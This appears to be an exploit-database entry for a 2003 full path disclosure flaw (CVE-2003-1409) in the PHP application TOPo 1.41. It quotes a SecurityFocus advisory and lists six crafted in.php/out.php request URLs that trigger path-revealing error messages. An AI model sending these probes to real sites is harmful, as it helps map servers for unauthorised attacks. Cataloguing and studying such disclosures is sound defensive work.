TOPO 1.41 - Full Path Disclosure

Author: Rynho Zeros Web
type: webapps
platform: php
port: 
date_added: 2003-02-04  
date_updated: 2012-10-24  
verified: 1  
codes: CVE-2003-1409;OSVDB-60267  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22222.txt  

source: https://www.securityfocus.com/bid/6768/info

It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources.

http://www.example.com/[top_path]/in.php?
http://www.example.com/[top_path]/out.php?
http://www.example.com/[top_path]/in.php?id=any_word
http://www.example.com/[top_path]/out.php?id=any_word
http://www.example.com/[top_path]/in.php?any_word
http://www.example.com/[top_path]/out.php?any_word